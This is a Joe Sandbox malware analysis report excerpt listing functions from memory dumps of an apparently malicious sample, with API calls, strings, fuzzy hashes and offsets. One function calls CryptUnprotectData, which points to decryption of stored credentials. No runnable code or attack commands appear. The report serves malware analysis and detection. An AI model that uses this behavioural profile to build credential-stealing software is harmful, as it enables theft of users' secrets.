Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 7b1c6cbb6fbedf0e74326c87fd599aa876504742c101c181360b3858052519b8
Instruction ID: 5c636470f9c0391496c227865c03d73849acfbb693e79ed9a9b4edd37e3bc04b
Opcode Fuzzy Hash: 7b1c6cbb6fbedf0e74326c87fd599aa876504742c101c181360b3858052519b8
Instruction Fuzzy Hash: B321ABB5D14209AFCF05EFE4D945AEEB7B9BF48300F04856AE506E3250EB345609CB69

Function 00187280 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0018728D
RtlAllocateHeap.NTDLL(00000000), ref: 00187294
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001872C1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001872E4
LocalFree.KERNEL32(?), ref: 001872EE

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 940837d8994da2caed6f5c70468005eb3e4decde00c250c64dec51be4fc54f7e
Instruction ID: 3a0095cc02379c281ebc78769a73d044fdb3b8eb0b6e38ae1e6ed9ab49695e0e
Opcode Fuzzy Hash: 940837d8994da2caed6f5c70468005eb3e4decde00c250c64dec51be4fc54f7e
Instruction Fuzzy Hash: B8010C75A44208BBDB15DBE4CD46FAE7778BB48B04F204144FB06AB2C0D6B0AA009BA5

Function 00537D08 Relevance: 7.2, Strings: 5, Instructions: 969COMMON

Download Yara Rule

Strings

o@pn, xrefs: 005386B0
!q}#, xrefs: 005381EC
XK_, xrefs: 005384A5
Qg>?, xrefs: 0053835A
r>, xrefs: 00538780

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: !q}#$Qg>?$o@pn$r>$XK_
API String ID: 0-872119339
Opcode ID: a679fd45d18dd9827f09e29f74625b9b41f875ef0c82bfd56b63d809d29ad767
Instruction ID: 7f312aff608e40de5b6a65b5628544fe79faab886d73cf4e8cfb1e31388f47a2
Opcode Fuzzy Hash: a679fd45d18dd9827f09e29f74625b9b41f875ef0c82bfd56b63d809d29ad767
Instruction Fuzzy Hash: 7B527CF3A0C7149FD3046E2DEC8566BFBE9EF94220F1A463DEAC4C7740E53598018692

Function 00533F23 Relevance: 6.6, Strings: 4, Instructions: 1619COMMON

Download Yara Rule

Strings

1W_, xrefs: 00534094
Q+v7, xrefs: 00534479
V/3, xrefs: 00534A93
`{, xrefs: 0053438D

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: Q+v7$V/3$`{$1W_
API String ID: 0-3578315516
Opcode ID: 9b79b1fa47b57549df84cb480a5e0d43b74d0c2435afc232c1d13d69fa17833d
Instruction ID: cb269e6e63c076454e1243f44ba00d7c3e940d0cb849566cc513d037be9c317b
Opcode Fuzzy Hash: 9b79b1fa47b57549df84cb480a5e0d43b74d0c2435afc232c1d13d69fa17833d
Instruction Fuzzy Hash: B4B215F360C2049FE3086E29EC8567ABBE5EF94320F1A493DE6C5C7744EA3598058697

Function 00198940 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000), ref: 00198960

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: febb8963f8ed7365ef382d27a18efafba76879b03213e27f5eaeea4bab14cc04
Instruction ID: 83e973b18418c797139813ecb431c614f23582d3b1209fa0643cefa8089d24b7
Opcode Fuzzy Hash: febb8963f8ed7365ef382d27a18efafba76879b03213e27f5eaeea4bab14cc04
Instruction Fuzzy Hash: 191100B5210209BFDF04CFA4D884FBB37A9AF8A718F109548F9098B250DB76EC41CB61

Function 00189B10 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ee317467b7541e350f9ffff11120a34333f50bb1fa975ada7e6b1df76ebad88b
Instruction ID: 9f13191c82d692f8ecd5de50ef4fd4ff2364719ac8220e5b6e1becf3616d1bfa
Opcode Fuzzy Hash: ee317467b7541e350f9ffff11120a34333f50bb1fa975ada7e6b1df76ebad88b
Instruction Fuzzy Hash: BE119074640308AFEB11CF64DC95FAA77B9FB89710F208458FA199B290D7B1AA41CB50

Function 0053A9B4 Relevance: 5.3, Strings: 3, Instructions: 1524COMMON

Download Yara Rule

Strings

#<?~, xrefs: 0053AD10
o`'X, xrefs: 0053B486
OAy, xrefs: 0053B1B8

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: #<?~$OAy$o`'X
API String ID: 0-4005649379
Opcode ID: 69196bebbf8149aae8da491feabcae2138c52d7ca161180689c0021832c45023
Instruction ID: a241d03bf19ec03d7f1af0aaf2d19909a59da06dfc5e1f1a05950ff32b4bdb36
Opcode Fuzzy Hash: 69196bebbf8149aae8da491feabcae2138c52d7ca161180689c0021832c45023
Instruction Fuzzy Hash: A7B2F4F3A0C2009FE304AE29DC8567ABBE5EF94720F1A893DEAC4C7344E63558558797

Function 00536123 Relevance: 4.8, Strings: 3, Instructions: 1065COMMON

Download Yara Rule

Strings

V?|, xrefs: 00536594
?Wv~, xrefs: 00536DB2
#'v, xrefs: 00536787

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: #'v$?Wv~$V?|
API String ID: 0-1869023910
Opcode ID: a92c47c9bbc69694f84fceaa7d44612e56547b642f906ae64a82f6ef1eb5e3fc
Instruction ID: 7bb1b978d6775c8d6ef9abee8a31628b172a2c9a74e53d4854d2ae6144e5954c
Opcode Fuzzy Hash: a92c47c9bbc69694f84fceaa7d44612e56547b642f906ae64a82f6ef1eb5e3fc
Instruction Fuzzy Hash: E972D8F360C6009FE304AE2DDC8567ABBE9EF94720F1A493DE6C4C3744EA3598458697

Function 6C6B6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C6B6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6B6E1E

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: e2761360f82e577d7b3459f93c193f9348bacba4c8d4969b027054e03b263c9f
Instruction ID: 76678a0436b64b360cde52552533b2dc78af67a2c3d412eb77134cc9e6ca7040
Opcode Fuzzy Hash: e2761360f82e577d7b3459f93c193f9348bacba4c8d4969b027054e03b263c9f
Instruction Fuzzy Hash: 23A17B706183818FD714CF25C490BAEBBF6BF89308F44491DE88A97751DB70E859CB9A

Function 6C6D85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6D8C7C
__aulldiv.LIBCMT ref: 6C6D8DD7

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 24a12f7af4b352b86b51eaa42da958b1e328a3afd7888ab961037a568f1c24a7
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 76328231F001198BDF18CE9DC4A57AEB7B2FB8C314F16913AE406BB7A0D634AD458B95

Function 6C6B5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C684A63,?,?), ref: 6C6B5F06

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: c6ed93c942321cdde50fc77f83fa0f7d08937cc352579db769f12d224cb5d089
Instruction ID: fa820bcb0ffc596a418f17d9a379f4342ddb9c4de5f05788853e618733f1e3da
Opcode Fuzzy Hash: c6ed93c942321cdde50fc77f83fa0f7d08937cc352579db769f12d224cb5d089
Instruction Fuzzy Hash: F2C19B75E012198BCB04CF99C1906EEBBF2BF8A318F28425DD8557BB44D732A816CF84

Function 004418F4 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

SlL, xrefs: 00441969

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
